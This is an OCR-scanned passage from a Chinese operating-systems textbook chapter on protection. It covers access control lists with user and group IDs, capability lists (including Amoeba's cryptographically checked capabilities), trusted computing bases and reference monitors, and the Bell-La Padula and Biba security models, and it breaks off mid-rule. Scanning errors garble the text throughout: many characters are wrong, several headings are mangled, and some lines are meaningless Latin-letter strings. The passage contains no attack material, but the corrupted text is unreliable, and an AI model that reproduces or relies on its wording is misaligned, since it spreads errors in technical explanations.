语义 学 上 组 的 变化 也 是 可 能 的 。 在 某 些 系统 中 ， 每 个 进程 除了 有 用 户 
ID (UID) 外 ， 还 有 组 ID (GID) 。 在 这 类 系统 中 ， 一 个 ACL 登 录 项 包 
括 了 下 列 格 式 的 登录 项 : 


UID1, GID1:rights1;UID2,GID2:rights2;... 


在 这 样 的 条 件 下 ， 当 出 现 要 求 访问 对 象 的 请 求 时 ， 必 须 使 用 调用 
者 的 UID 和 GID 来 进行 检查 。 如 采 它 们 出 现在 AcCL 中 ， 所 列 出 的 权限 丈 
是 可 行 的 。 如 果 (UID, GID) 的 组 合 不 在 列表 中 ， 访 问 就 被 拒绝 。 


使 用 组 的 方法 就 引入 了 角色 (role) 的 概念 。 如 在 某 次 系统 安装 
后 ，Tana 是 系统 管理 员 ， 在 组 里 是 sysadm。 但 是 假设 公司 里 也 有 很 多 
为 员工 组 织 的 俱乐部 ， 而 Tana 是 养 名 爱好 者 的 一 员 。 俱 乐 部 成 员 属于 


pigfan 组 并 可 访问 公司 的 计算 机 来 管理 鸽子 的 数据 。 那 么 ACL 中 的 一 部 
分 会 如 图 9-8 所 示 。 


_Password tana, sysadm: RW 
|Pigeon_data_| bill, pigfan: RW; tana, pigfan: RW; .. 


图 9-8 两 个 访问 控制 列表 


如 琳 Tana 想 要 访问 这 些 文 件 ， 那 么 访问 的 成 功 与 否 将 取决 于 她 当 
前 所 登录 的 组 。 当 她 登录 的 时 候 ， 系 统 会 让 她 选择 想 使 用 的 组 ， 或 者 
提供 不 同 的 登录 名 和 密码 来 区 分 不 同 的 组 。 这 一 措施 的 目的 在 于 阻止 
Tana 在 使 用 养 铝 爱好 者 组 的 时 候 获 得 密码 文件 。 只 有 当 她 登录 为 系统 
管理 员 时 才 可 以 这 么 做 。 


在 有 些 情况 下 ， 用 户 可 以 访问 特定 的 文件 而 与 当前 登录 的 组 无 
关 。 这 样 的 情况 将 引入 通配符 (wildcard) 的 概念 ， 即 “任何 组 ”的 意 
思 。 如 ， 密 码 文件 的 登录 项 


tana, * :RW 


会 给 Tana 访 问 的 权限 而 不 管 她 的 当前 组 是 什么 。 


但 是 男 一 种 可 能 是 如 果 用 户 属 于 任何 一 个 至 有 特定 权限 的 组 ， 访 
问 束 被 允许 。 这 种 方法 的 优 后 是 ， 属 于 多 个 组 的 用 户 不 必 在 登录 时 指 


定 组 的 名 称 。 所 有 的 组 都 被 计算 在 内 。 同 时 它 的 缺点 是 几乎 没有 提供 
什么 封装 性 : Tana 可 以 在 吾 开 养 鸽 俱乐部 会 议 时 编辑 密码 文件 。 


组 和 通配符 的 使 用 使 得 系统 有 可 能 有 选择 地 阻止 用 户 访 问 某 个 文 
件 。 如 ， 登 录 项 


virgil, *:(none);*,*:RW 


给 Virgil 之 外 的 登录 项 以 读 写 文件 的 权限 。 上 壕 方 法 是 可 行 的 ， 因 
为 登 孙 项 是 按 顺序 扫描 的 ， 只 要 第 一 个 被 采用 ， 后 续 的 登 孙 项 就 不 需 
要 再 检查 。 在 第 一 个 登录 项 中 为 Virgil 找 到 了 匹配 ， 然 后 找到 并 应 用 这 
个 存 取 权限 ， 在 本 例 中 为 (none) 。 整 个 查找 在 这 时 就 中 断 了 。 实 际 
上 ， 再 也 不 去 检查 剩 下 的 访问 权限 了 。 


还 有 一 种 处 理 组 用 户 的 方法 ， 无 须 使 用 包含 (UID, GID) 对 的 
ACL 登 永 项 ， 而 是 让 每 个 登录 项 成 为 UID 或 GID。 如 ， 一 个 进入 文件 


pigeon_data 的 登录 项 是 : 


debbie:RW;phil:RW;pigfan:RW 


表示 debbie、phil 以 及 其 他 所 有 pigfan 组 里 的 成 员 都 可 以 读 写 该 文 
imme 


有 时 候 也 会 发 生 这 样 的 情况 ， 即 一 个 用 户 或 组 对 特定 文件 有 特定 
的 许可 权 ， 但 文件 的 所 有 者 稍 后 又 会 收回 。 通 过 访问 控制 列表 ， 收 回 
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是 如 果 ACL 仅 仅 在 打开 某 个 文件 时 才 会 检查 ， 那 么 改变 它 以 后 的 结 
残 只 有 在 将 来 调用 open 命 令 时 才能 雪 效 。 对 于 已 经 打开 的 文件 ， 束 会 
仍然 持 有 原来 打开 时 拥有 的 权限 ， 即 使 用 户 已 经 不 再 具有 这 样 的 权 
限 。 


9.3.3 AEE 
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候 ， 与 每 个 进程 关联 的 是 可 访问 的 对 象 列 表 ， 以 及 每 个 对 象 上 可 执行 
操作 的 指示 。 这 一 栏 叫 做 权能 字 列 表 (capability list 或 C-list) ， 而 且 每 
个 单独 的 项 目 叫 做 权能 字 (Dennis 和 Van Horn, 1966; Fabry1974) 。 
一 个 3 进程 集 和 它们 的 权能 字 列 表 如 图 9-9 所 示 。 


用 户 


空间 


内 核 
空间 


权能 字 列 表 


图 9-9 在 使 用 权能 字 时 ， 每 个 进程 都 有 一 个 权能 字 列表 


每 一 个 权能 字 赋 予 所 有 者 针对 特定 对 象 的 权限 。 如 在 图 9-9 中 ， 用 
户 A 所 拥有 的 进程 可 以 读 文 件 F1 和 F2。 一 个 权能 字 通 常 包 含 了 文件 (或 
者 更 一 般 的 情况 下 是 一 个 对 象 ) 的 标识 符 和 用 于 不 同 权限 的 位 图 。 在 


类 似 UNIX 的 系统 中 ， 文 件 标 识 符 可 能 是 iT 点 号 。 权 能 字 列 表 本 身 也 坪 
对 象 ， 也 可 以 从 其 他 权能 字 列 表 处 指定 ， 这 样 束 有 助 于 共享 子 域 。 


很 明显 权能 字 列 表 必 须 防 止 用 户 进行 自 改 。 已 知 的 保护 方法 有 三 
种 。 第 一 种 方法 需要 建立 带 标记 的 体系 结构 (tagged architecture) ， 在 
这 种 硬件 设计 中 ， 每 个 内 存 字 节 必 须 拥 有 额外 的 位 (或 标记 ) 来 判断 
该 字 节 是 否 包 含 了 权限 字 。 标 记 位 不 能 被 算术 、 比 较 或 相似 的 指令 使 
用 ， 它 仅 可 以 被 在 核心 态 下 运行 的 程序 修改 (如 操作 系统 ) 。 人 们 已 
经 构造 了 带 标记 体系 结构 的 计算 机 ， 并 可 以 稳定 地 运行 (Feustal， 
1972) ° IBM AS/400 就 是 一 个 公认 的 例子 。 


二 种 方法 古 在 操作 系统 里 保存 权能 字 列 表 。 随 后 根据 权能 子 在 
列表 中 的 位 置 引 用 权能 字 。 某 个 进程 也 许 会 说 :“ 从 权能 字 2 所 指 癌 的 
文件 中 读 取 1KB”。 这 种 寻 址 方法 有 些 类 似 UNIX 里 的 文件 摘 述 符 。 
Hydra (Wulf 等 人 ，1974) 采用 的 就 是 这 种 方法 。 


第 三 种 方法 是 把 权能 字 列 表 放 在 用 户 空 间 里 ， 并 用 加 密 方法 进行 
管理 ， 这 样 用 户 束 不 能 自 改 它们 。 这 种 方法 特别 适合 分 布 式 操作 系 
统 ， 并 可 按 下 述 的 方式 工作 。 当 客户 进程 发 送 消息 到 远程 服务 器 (如 
一 台 文 件 服务 器 ) 时 ， 请 求 为 自己 创 建 一 个 对 象 时 ， 服 务 器 会 在 创建 
对 象 的 同时 创建 一 条 长 随机 码 作为 校 验 字段 附 在 该 对 象 上 。 文 件 服务 
絮 为 对 象 预 留 了 槽 口 ， 以 便 存放 校 验 字段 和 磁盘 局 区 地 址 等 。 在 UNIX 
术语 中 ， 校 验 字 段 被 存放 在 服务 占 的 i 厅 护 中 。 校 验 字 段 不 会 返回 用 


F, thiRDR BORE ASE RARR ERF EA AA a 9-108 xh 
的 权能 字 ° 


f KTR, BLUE, BEAD 


图 9-10 采用 了 密码 保护 的 权能 字 


返回 给 用 户 的 权能 字 包 括 服务 器 的 标识 符 、 对 象 号 ARS a FE 
索引 ， 主 要 是 inode 码 ) 以 及 以 位 图 形式 存放 的 权限 。 对 一 个 新 建 的 对 
象 来 说 ， 所 有 的 权限 位 都 是 处 于 打开 状态 的 ， 这 显然 是 因为 该 对 象 的 
拥有 者 有 权限 对 该 对 象 做 任何 事情 。 最 后 的 字段 包含 了 对 象 、 权 限 以 
及 校 验 字段 。 校 验 字 段 运行 在 通过 密码 体制 保护 的 单 向 范 数 {上 ， 我 们 
已 经 讨论 过 这 种 函数 。 


当 用 户 想 访问 对 象 时 ， 首 先 要 把 权能 字 作 为 发 送 请 求 的 一 部 分 传 
送 到 服务 右 。 然 后 服务 器 提取 对 象 编号 并 通过 服务 器 列表 索引 找到 对 
象 。 再 计算 f 对象， 权限 ， 校 验 ) 。 前 两 个 参数 来 自 于 权能 字 本 身 ， 
而 第 三 个 参数 来 目 于 服务 器 表 。 如 琳 计 算 值 特 合 权 能 子 的 第 四 个 字 
段 ， 请 求 束 被 接受 ， 否 则 被 拒绝 。 如 果 用 户 想 要 访问 其 他 人 的 对 象 ， 
他 残 不 能 仿造 第 四 个 域 的 值 ， 因 为 他 不 知道 校 难 字段 ， 所 以 请 求 将 被 
拒绝 。 


用 户 可 以 要 求 服 务 器 建立 一 个 较 弱 的 权能 字 ， 如 只 读 访问 。 服 务 
器 首 移 检查 权能 字 的 合法 性 ， 检 查 成 功 则 计算 f{ 对象 ， 新 的 权限 ， 校 
验 ) 并 产生 新 的 权能 字 放 入 第 四 个 字段 中 。 请 注意 原来 的 校 验 值 仍 在 
使 用 ， 因 为 其 他 较 强 的 权能 字 仍 然 需要 该 校 验 值 。 


新 的 权能 字 被 被 发 送 回 请 求 进程 。 现 在 用 户 可 以 在 消息 中 附加 该 
权能 字 发 送 到 朋友 处。 如 果 朋 友 打 开 了 应 该 被 关闭 的 权限 位 ， 服 务 器 
就 会 在 使 用 权限 字 时 检测 到 ， 因 为 { 的 值 与 错误 的 权限 位 不 能 对 应 。 既 
然 朋 友 不 知道 真正 的 校 验 字 段 ， 他 就 不 能 伪造 与 错误 的 权限 位 相对 应 
的 权能 字 。 这 种 方法 最 早 是 由 Amoeba 系 统 开 发 的 ， 后 被 广泛 使 用 
(Tanenbaum 等 人 ,1990) 。 


除了 特定 的 与 对 象 相关 的 权限 《如 读 和 执行 操作 ) 外 ， 权 能 字 中 
(包括 在 核心 态 和 密码 保护 模式 下 ) 通常 包含 一 些 可 用 于 所 有 对 象 的 
普通 权限 。 这 些 普通 权限 有 : 


TD) 复制 权能 字 : 为 同一 个 对 象 创建 新 的 权能 字 。 


2) 复 制 对 象 ， 用 新 的 权能 字 创 建 对 象 的 副本 。 


3) 移 除权 能 字 : 从 权能 字 列 表 中 删 去 登录 项 ， 不 影响 对 象 。 


4) 销 毁 对 象 : 永久 性 地 移 除 对 象 和 权能 字 。 


最 后 值得 说 明 的 是 ， 在 核心 管理 的 权能 子 系统 中 ， 撤 回 对 对 象 的 
访问 是 十 分 困难 的 。 系 统 很 难为 任意 对 象 找 到 它 所 有 显著 的 权能 字 并 
撤回 ， 因 为 它们 存储 在 磁盘 各 处 的 权能 字 列 表 中 。 一 种 办 法 是 把 每 个 
权能 字 指 向 间接 的 对 象 ， 而 不 是 对 象 本 号 。 再 把 间接 对 象 指 向 真正 的 
对 象 ， 这 样 系统 就 能 打 断 连接 关系 使 权能 字 无 效 。 ( 当 指 向 间接 对 象 
的 权能 字 后 来 出 现在 系统 中 时 ， 用 户 将 发 现 间接 对 象 指向 的 是 一 个 空 
的 对 象 。) 


在 Amoeba 系 统 结 构 中 ， 撤 回 权 能 字 是 十 分 容易 的 。 要 做 的 仅仅 是 
改变 存放 在 对 象 里 的 校 验 字段 。 只 要 改变 一 次 就 可 以 使 所 有 的 失效 。 
但 是 没有 一 种 机 制 可 以 有 选择 性 地 撤回 权能 字 ， 如 ， 仅 撤回 John 的 许 
可 权 ， 但 不 撤回 任何 其 他 人 的 。 这 一 缺陷 也 被 认为 是 权限 系统 的 一 个 
主要 问题 。 


另 一 个 主要 问题 生 确 保 合 法 权能 字 的 拥有 者 不 会 给 他 最 好 的 朋友 
1000 个 副本 。 采 用 核心 管理 权能 字 的 模式 ， 如 Hydra 系 统 ， 这 个 问题 得 
到 解决 。 但 在 如 Amoeba 这 样 的 分 布 式 系统 中 却 无 法 解决 这 个 问题 。 


男 一 方面 ， 权 能 字 非 常 漂亮 地 解决 了 移动 代码 的 沙 盒 问 题 。 当 外 
来 程序 开始 运行 时 ， 给 出 的 权能 字 列 表 里 只 包含 了 机 器 所 有 者 想 要 给 
的 权能 ， 如 在 屏幕 上 进行 写 操作 以 及 在 刚 创 建 的 临时 目录 里 读 写 文件 
的 权利 。 如 有 果 移 动 代码 被 放 进 了 目 己 的 只 拥有 这 些 有 限 权能 的 进程 
中 ， 束 无 法 访问 其 他 任何 资源 ， 相 当 于 被 有 效 地 限制 在 了 沙 盒 里 。 这 


种 方法 不 需要 修改 代码 ， 也 不 需要 解释 性 执行 。 当 运行 的 代码 拥有 所 
需 的 最 少 访问 权时 ， 符 合 了 最 小 特权 规则 ， 这 也 是 建立 安全 操作 系统 
HAFT. 


93.4 ”可 信和 系统 


人 们 总 十 可 以 从 各 种 渠道 中 获得 天 于 病毒 、 蚂 虫 以 及 其 他 相关 的 
消 思 。 天 真 的 人 可 能 会 问 下面 两 个 问题 : 


1) 建 立 一 个 安全 的 操作 系统 有 可 能 吗 ? 
2) 如 采 可 能 ， 为 什么 不 去 做 呢 ? 


第 一 个 问题 的 答案 原则 上 是 肯定 的 。 如 何 建立 安全 系统 的 答案 人 
们 数 十 年 前 就 知道 了 。 例 如 ， 在 20 世 纪 60 年 代 设 计 的 MULTICS 就 把 安 
全 作为 主要 目标 之 一 而 且 做 得 非常 好 。 


为 什么 不 建立 一 个 安全 系统 是 一 个 更 为 复杂 的 问题 ， 主 要 原因 有 
两 个 。 首 先 ， 现 代 系 统 昌 然 不 安全 但 是 用 户 不 愿 抛弃 它们 。 假 设 
Microsoft 宣 布 除了 Windows 外 还 有 一 个 新 的 SecureOS 产 品 ， 并 保证 不 
会 受到 病毒 感染 但 不 能 运行 Windows 应 用 程序 ， 那 么 很 少 会 有 用 户 和 
公司 把 Windows 像 个 资 手 山 全 一样 扔 掉 转 而 立即 购买 新 的 系统 。 事 实 
上 Microsoft 的 确 有 一 款 SecureOS (Fandrich 等 人 ,2006) ， 但 是 并 没有 
投入 商业 市 场 。 


第 二 个 原因 更 敏感 。 现 在 已 知 的 建立 安全 系统 仅 有 的 办 法 是 保持 
系统 的 简单 性 。 特 性 是 安全 的 大 敌 。 系 统 设计 师 相信 (无 论 是 正确 还 


是 错误 的 ， 用 户 所 想 要 的 是 更 多 的 特性 。 更 多 的 特性 意味 着 更 多 的 复 
杂 性 ， 更 多 的 代码 以 及 更 多 的 安全 性 错误 。 


这 里 有 两 个 简单 的 例子 。 最 早 的 电子 邮件 系统 通过 ACSII 文 本 发 
送 消 息 。 它 们 是 完全 安全 的 。ASCII 文 本 不 可 能 对 计算 机 系统 造成 损 
失 。 然 后 人 们 想方设法 扩展 电子 邮件 的 功能 ， 引 入 了 其 他 类 型 的 文 
档 ， 如 可 以 包含 宏 程 序 的 Word 文 件 。 读 这 样 的 文件 意味 着 在 自己 的 计 
算 机 上 运行 别人 的 程序 。 无 论 沙 盒 怎 么 有 效 ， 在 自己 的 计算 机 上 运行 
别人 的 程序 必定 比 ASCII 文 本 要 危险 得 多 。 是 用 户 要 求 从 过 去 的 文本 
格式 改 为 现在 的 活动 程序 吗 ? 大 概 不 是 吧 ， 但 系统 设计 人 员 认 为 这 是 
个 极 好 的 主意 ， 而 没有 考虑 到 隐 含 的 安全 问题 。 


第 二 个 例子 古 关 于 网 页 的 。 过 去 的 HTML 网 页 没有 造成 大 的 安全 
问题 (虽然 非法 网 页 也 可 能 导致 缓冲 液 出 攻击 ) 。 现 在 许多 网 页 都 包 
含 了 可 执行 程序 (Applet) ， 用 户 不 得 不 运行 这 些 程序 来 浏览 网 页 内 
容 ， 结 果 一 个 又 一 个 安全 漏洞 出 现 了 人。 即便 一 个 漏洞 被 补 上 ， 叉 会 有 
新 的 漏洞 显现 出 来 。 当 网 页 完全 是 静态 的 时 候 ， 古 用 户 要 求 增加 动态 
内 容 的 吗 ? 可 能 动态 网 页 的 设计 者 也 记 不 得 了 ， 但 随 之 而 来 是 大 量 的 
安全 问题 。 这 有 点 像 负 贡 说 “不 ”的 副 总 统 在 车 轮 下 睡 痢 了 。 


实际 上 ， 确 实 有 些 组 织 认 为 ， 与 非常 漂亮 的 狐 功 能 相 比 ， 好 的 安 
全 性 更 为 重要 。 军 方 组 织 整 古 一 个 重要 的 例子 。 在 接 下 来 的 几 市 中 ， 
我 们 将 研究 相关 的 一 些 问 题 ， 不 过 这 些 问 题 不 是 几 人 句 话 便 能 说 清楚 


的 。 要 构建 一 个 安全 的 系统 ， 需 要 在 操作 系统 的 核心 中 实现 安全 模 
型 ， 且 该 模型 要 非常 简单 ， 从 而 设计 人 员 确 实 能 够 理解 模型 的 内 涵 ， 
并 且 顶 住所 有 压力 ， 避 免 偏 离 安 全 模型 的 要 求 去 添加 新 的 功能 特性 。 


9.3.55 ae HAA 


在 安全 领域 中 ， 人 们 通常 讨论 可 信 系 统 而 不 是 安全 系统 。 这 些 系 
统 在 形式 上 申明 了 安全 要 求 并 满足 了 这 些 安 全 要 求 。 每 一 个 可 信 系 统 
的 核心 是 最 小 的 可 信 计 算 基 (Trusted Computing Base, TCB) ， 其 中 
包含 了 实施 的 所 有 安全 规则 所 必需 的 硬件 和 软件 。 如 果 这 些 可 信 计 算 
基 根 据 系统 规约 工作 ， 那 么 ， 无 论 发 生 了 什么 错误 ， 系 统 安全 性 都 不 
会 受到 威胁 。 


典型 的 TCB 包 括 了 大 多 数 的 硬件 (除了 不 影响 安全 性 的 VO 设 
备 ) 、 操 作 系 统 核心 的 一 部 分 、 大 多 数 或 所 有 掌握 超级 用 户 权限 的 用 
户 程序 (如 在 UNIX 中 的 SETUID 根 程序 。 必 须 包 含 在 操作 系统 中 的 
TCB 功 能 有 : 进程 创建 、 进 程 切换 、 内 存 页 面 管理 以 及 部 分 的 文件 以 
及 IO 管理 。 在 安全 设计 中 ， 为 了 减少 空间 以 及 纠正 错误 ，TCB 通 党 完 
全 独立 于 操作 系统 的 其 他 部 分 。 


TCB 中 的 一 个 重要 组 成 部 分 是 引用 监视 项 ， 如 图 9-11 所 示 。 引 用 监 
视 器 接受 所 有 与 安全 有 关 的 系统 请 求 (如 打开 文件 等 ， 然 后 决定 是 
否 允 许 运 行 。 引 用 监视 器 要 求 所 有 的 安全 问题 决策 都 必须 在 同一 处 考 


所 有 系统 调用 通过 访问 
监视 器 进行 安全 检查 


| 用 户 空间 


访问 监视 器 
可 信 计 算 基 淮 内 核 空 间 


图 9-11 引用 监视 器 


现今 安全 研究 的 一 个 目标 是 将 可 信 计 算 基 中 数 百 万 行 的 代码 缩短 
为 只 有 数 万 行 代码 。 在 图 1-26 中 我 们 看 到 了 MINIX 3 操作 系统 的 结构 。 
MINIX 3 是 具有 POSIX 兼 容 性 的 系统 ， 但 又 与 Linux 或 FreeBSD 有 着 完全 
不 同 的 结构 。 在 MINIX 3 中 ， 只 有 4000 行 左右 的 代码 在 内 核 中 运行 。 其 
余部 分 作为 用 户 进 程 运行 。 其 中 ， 如 文件 系统 和 进程 管理 器 是 可 信 基 
的 一 部 分 ， 因 为 它们 与 系统 安全 息息相关 ; 但 是 诸如 打印 机 驱动 和 音 
频 驱 动 这 样 的 程序 并 不 作为 可 信 计 算 库 的 一 部 分 ， 因 为 不 管 这 些 程 序 
出 了 什么 问题 ， 它 们 的 行为 也 不 可 能 危及 系统 安全 。MINIX 3 将 可 信 计 
算 库 的 代码 量 减少 了 两 个 数量 级 ， 从 而 潜在 地 比 传统 系统 设计 提供 了 
更 高 的 安全 性 。 


93.6 ”安全 系统 的 形式 化 模型 


诸如 图 9-5 的 保护 矩阵 并 不 是 静态 的 。 它 们 通常 随 着 创建 新 的 对 
象 ， 销 哎 旧 的 对 象 而 改变 ， 而 且 所 有 者 决定 对 象 的 用 户 集 的 增加 或 限 
制 。 人 们 把 大 量 的 精力 花费 在 建立 安全 系统 模型 ， 这 种 模型 中 的 保护 
和 窍 阵 处 于 不 断 的 变化 之 中 。 在 本 世 的 稍 后 部 分 ， 我 们 将 简单 介绍 这 方 
面 的 工作 原理 。 


几 十 年 前 ，Harrison 等 人 (1976) 在 保护 矩阵 上 确定 了 6 种 最 基本 
的 操作 ， 这 些 操作 可 用 于 任何 安全 系统 模型 的 基准 。 这 些 最 基本 的 操 
作 是 create object, delete object, create domain, delete domain, insert 
right 和 remove right。 最 后 的 两 种 插入 和 删除 权限 操作 来 自 于 特定 的 矩 
阵 单元 ， 如 赋予 域 1 读 文 件 6 的 许可 权 。 


上 述 6 种 操作 可 以 合并 为 保护 命令 。 用 户 程序 可 以 运行 这 些 命令 来 
改变 保护 矩阵。 它们 不 可 以 直接 执行 最 原始 的 操作 。 例 如 ， 系 统 可 能 
有 一 个 创建 新 文件 的 命令 ， 该 命令 首先 查看 该 文件 是 否 已 存在 ， 如 采 
不 存在 就 创建 新 的 对 象 并 赋予 所 有 者 相应 的 权限 。 当 然 也 可 能 
命令 允许 所 有 者 赋予 系统 中 所 有 用 户 读 取 该 文件 的 权限 。 实 际 上 ， 
要 把 * 读 ?权限 插入 到 每 个 域 中 该 文件 的 登录 项 即 可 。 


WEA, CRAP REE RE T EEM PR — PERE BT DAT REP 
作 ， 而 不 是 被 授权 执行 哪些 操作 。 和 矩阵 是 由 系统 来 强制 的 ， 而 授权 和 与 
管理 策略 有 关 。 为 了 说 明 其 差别 ， 我 们 看 一 看 图 9-12 域 与 用 户 相 对 应 的 
例子 。 在 图 9-12a 中 ， 我 们 看 到 了 既定 的 保护 策略 : Henry 可 以 读 写 
mailbox7，Robert 可 以 读 写 secret， 所 有 的 用 户 可 以 读 和 运行 compiler 。 


对 象 对 象 


Compiler Mailbox 7 Secret 


Eric 


Henry 


Robert 


图 9-12 a) 授 权 后 的 状态 ，b) 未 授权 的 状态 


现在 假设 Robert 非 党 聪明 ， 并 找到 了 一 种 方法 发 出 命令 把 保护 矩阵 
改 为 如 图 9-12b 所 示 。 现 在 他 束 可 以 访问 mailbox7 了 ， 这 年 他 本 来 未 被 
授权 的 。 如 果 他 想 读 文件 ， 操 作 系 统 束 可 以 执行 他 的 请 求 ， 因 为 操作 
系统 并 不 知道 图 9-12b 的 状态 是 未 被 授权 的 。 


很 明显 ， 所 有 可 能 的 矩阵 被 划分 为 两 个 独立 的 集合 : 所 有 处 于 授 
权 状 态 的 集合 和 所 有 未 授权 的 集合 。 经 过 大 量 理论 上 的 研究 后 会 有 这 
样 一 个 问题 : 给 定 一 个 最 原始 的 授权 状态 和 命令 集 ， 征 否 能 证 明 系 统 


永远 不 能 达到 未 授权 的 状态 ? 


实际 上 ， 我 们 是 在 询问 可 行 的 安全 机 制 (保护 命令 ) 是 否 足以 强 
制 某 些 安全 策略 。 给 定 了 这 些 安全 策略 、 最 初 的 矩阵 状态 和 改变 这 些 
矩阵 的 命令 集 ， 我 们 希望 可 以 找到 建立 安全 系统 的 方法 。 这 样 的 证 明 
过 程 是 非常 困难 的 : 许多 一 般 用 途 的 系统 在 理论 上 是 不 安全 的 。 
Harrison 等 人 (1976) 曾经 证 明 在 一 个 不 定 的 保护 系统 的 不 定 配置 中 ， 
其 安全 性 从 理论 上 来 说 是 不 确定 的 。 但 是 对 特定 系统 来 说 ， 有 可 能 证 
明 系 统 可 以 从 授权 状态 转移 到 未 授权 状态 。 要 获得 更 多 的 信息 请 看 
Landwehr (1981) ° 


93.7 BREE 


大 多 数 操作 系统 允许 个 人 用 户 来 决定 谁 可 以 读 写 他 们 的 文件 和 其 
他 对 象 。 这 一 策略 称 为 可 自由 文 配 的 访问 控制 (discretionary access 
control) 。 在 许多 环境 下 ， 这 种 模式 工作 很 稳定 ， 但 也 有 些 环境 需要 更 
高 级 的 安全 ， 如 军 方 、 企 业 专 利 部 门 和 医院 。 在 这 类 环境 里 ， 机 构 定 
义 了 有 关 谁 可 以 看 什么 的 规则 ， 这 些 规 则 是 不 能 被 士兵 、 律 师 或 医生 
改变 的 ， 至 少 没有 老板 的 许可 是 不 允许 的 。 这 类 环境 需要 强制 性 的 访 
问 控 制 (mandatory access control) 来 确保 所 阐明 的 安全 策略 被 系统 强 
制 执行 ， 而 不 是 可 目 由 支配 的 访问 控制 。 这 些 强制 性 的 访问 控制 管理 
整个 信息 流 ， 确 休 不 会 泄漏 那些 不 应 该 泄漏 的 信息 。 


1.Bell-La Padula 模 型 


最 广泛 使 用 的 多 级 安全 模型 是 Bell-La Padula 模 型 ， 我 们 将 看 看 它 
是 如 何 工作 的 (Bell La 和 Padula,1973) 。 这 一 模型 最 初 为 管理 军 方 安 
全 系统 而 设计 ， 现 在 被 广泛 运用 于 其 他 机 构 。 在 军 方 领域 ， 文 档 〈 对 
象 ) 有 一 定 的 安全 等 级 ， 如 内 部 级 、 秘 密级 、 机 密级 和 绝密 级 。 每 个 
人 根据 他 可 阅读 文档 的 不 同 也 被 指定 为 不 同 的 密级 。 如 将 军 可 能 有 权 
阅 取 所 有 的 文档 ， 而 中 尉 可 能 只 被 限制 在 秘密 级 或 更 低 的 文档 。 代 表 
用 户 运行 的 进程 具有 该 用 户 的 安全 密级 。 由 于 该 系统 拥有 多 个 安全 等 
级 ， 所 以 被 称 为 多 级 安全 系统 。 


Bell-La Padula 模 型 对 信息 流 做 出 了 一 些 规定 : 


1) 简 易 安全 规则 ， 在 密级 k 上 面 运行 的 进程 只 能 读 同一 密级 或 更 低 
密级 的 对 象 。 例 如 ， 将 军 可 以 阅 取 中 尉 的 文档 ， 但 中 尉 却 不 可 以 阅 取 
将 盏 的 文档 。 


2)* 规 则 : 在 密级 k 上 面 运行 的 进程 只 能 写 同 一 密级 或 更 高 密级 的 对 
象 。 例 如 ， 中 尉 只 能 在 将 军 的 信箱 添加 信息 告知 目 己 所 知 的 全 部 ， 但 
征 将 军 不 能 在 中 尉 的 信箱 里 添加 信息 告知 自己 所 知 的 全 部 ， 因 为 将 军 
拥有 绝密 的 文档 ， 这 些 文 档 不 能 讶 露 给 中 尉 。 


简 而 言 之 ， 进 程 既 可 下 读 也 可 上 写 ， 但 不 能 颠倒 。 如 果 系 统 严 格 
地 执行 上 述 两 条 规则 ， 那 么 就 不 会 有 信息 从 高 一 级 的 安全 层 泄露 到 低 
一 级 的 安全 层 。 之 所 以 用 * 代 表 这 种 规则 是 因为 在 最 初 的 论文 里 ， 作 者 
没有 想 出 更 好 的 名 字 所 以 只 能 用 * 作 为 临时 的 替代 。 但 是 最 终 作者 没有 
想 出 更 好 的 名 字 ， 所 以 在 打印 论文 时 用 了 *。 在 这 一 模型 中 ， 进 程 可 以 
读 写 对 象 ， 但 不 能 直接 相互 通信 。Bell-La Padula 模 型 的 图 解 如 图 9-13 所 
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图 9-13 Bell-La Padula 多 层 安 全 模型 


在 图 中 ， 从 对 象 到 进程 的 〈 实 线 ) 箭头 代 该 进程 正在 读 取 对 象 ， 
也 就 是 说 ， 信 息 从 对 象 流向 进程 。 同 样 ， 从 进程 到 对 象 的 〈 虚 线 ) BT 
头 代 表 进 程 正在 写 对 象 ， 也 就 是 说 ,信息 从 进程 流 问 对 象 。 这 样 所 有 
的 信息 流 都 沿 着 箭头 方 问 流动。 例如， 进程 B 可 以 从 对 象 1 读 取信 息 但 
却 不 可 以 从 对 象 3 读 取 。 


简单 安全 模型 显示 ， 所 有 的 实 线 O) 箭头 横向 运动 或 向 上 ;，* 规 
则 显示 所 有 的 虚线 箭头 〈 写 ) 也 横向 运行 或 向 上 。 既 然 信息 流 要 么 水 
F, 要么 垩 直 ， 那 么 任何 从 k 层 开始 的 信息 都 不 可 能 出 现在 更 低 的 级 
别 。 也 就 是 说 ， 没 有 路 径 可 以 让 信息 往 下 运行 ， 这 样 束 保 证 了 模型 的 
安全 性 。 


Bell-La Padula 模 型 涉及 组 织 结构 ， 但 最 终 还 是 需要 操作 系统 来 强 
制 执行 。 实 现 上 述 模型 的 一 种 方式 是 为 每 个 用 户 分 配 一 个 安全 级 别 ， 
该 安全 级 别 与 用 户 的 认证 信息 (如 UID 和 GID) 一 起 存储 。 在 用 户 登 陆 
的 时 候 ，shell 获 取 用 户 的 安全 级 别 ， 且 该 安全 级 别 会 被 shell 创 建 的 所 有 
子 进程 继承 下 去 。 如 果 一 个 运行 在 安全 级 别 k 之 下 的 进程 试图 访问 一 个 
安全 级 别 比 k 高 的 文件 或 对 象 ， 操 作 系统 将 会 拒绝 这 个 请 求 。 相 似 地 ， 
任何 试图 对 安全 级 别 低 于 k 的 对 和 象 执行 写 操作 的 请 求 也 一 定 会 失败 。 


2.Biba 模 型 


为 了 总 结 用 军 方 术语 表示 的 Bell-La Padula 模 型 ， 一 个 中 尉 可 以 让 
一 个 士兵 把 自己 所 知道 的 所 有 信息 复制 到 将 军 的 文件 里 而 不 妨碍 安 
全 。 现 在 让 我 们 把 同样 的 模型 放 在 民用 领域 。 设 想 一 家 公司 的 看 门人 
拥有 等 级 为 1 的 安全 性 ， 程 序 员 拥有 等 级 为 3 的 安全 性 ， 总 裁 拥 有 等 级 
为 5 的 安全 性 。 使 用 Bell-La Padula 模 型 ， 程 序 员 可 以 向 看 门人 询问 公司 
的 发 展 规划 ， 然 后 覆 写 总 裁 的 有 关 企业 策略 的 文件 。 但 并 不 是 所 有 的 
公司 都 热衷 于 这 样 的 模型 。 


Bell-La Padula 模 型 的 问题 在 于 它 可 以 用 来 保守 机 密 ， 但 不 能 保证 
数据 的 完整 性 。 要 保证 数据 的 完整 性 ， 我 们 需要 更 精确 的 逆向 特性 
(Biba, 1977) ° 


1) 简 单 完 整 性 原理 : 在 安全 等 级 k 上 运行 的 进程 只 能 写 同 一 等 级 或 
更 低 等 级 的 对 象 (没有 往 上 写 ) 。 

2) 完 整 性 * 规 则 ， 在 安全 等 级 k 上 运行 的 进程 只 能 读 同一 等 级 或 更 高 
